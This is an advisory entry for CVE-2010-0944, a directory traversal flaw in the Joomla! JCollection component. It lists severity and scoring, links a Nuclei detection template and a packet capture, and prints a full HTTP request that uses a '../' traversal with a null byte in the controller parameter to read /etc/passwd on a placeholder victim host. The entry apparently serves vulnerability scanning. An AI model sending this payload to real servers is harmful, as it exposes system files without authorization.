| Title | Joomla! Component com_jcollection - Directory Traversal |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to read arbitrary files on the server. |
| Remediation | Apply all relevant security patches and product upgrades. |
| CVSS Score | 5 |
| EPSS Score | 0.01386 |
| CVE ID | CVE-2010-0944 |
| CWE ID | CWE-22 |
| Tags | cve2010 cve joomla lfi edb packetstorm thorsten_riess vuln |
A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-0944.yaml
🦈 Packet Capture: ⬇️ Download cve-2010-0944.pcap
N/AN/A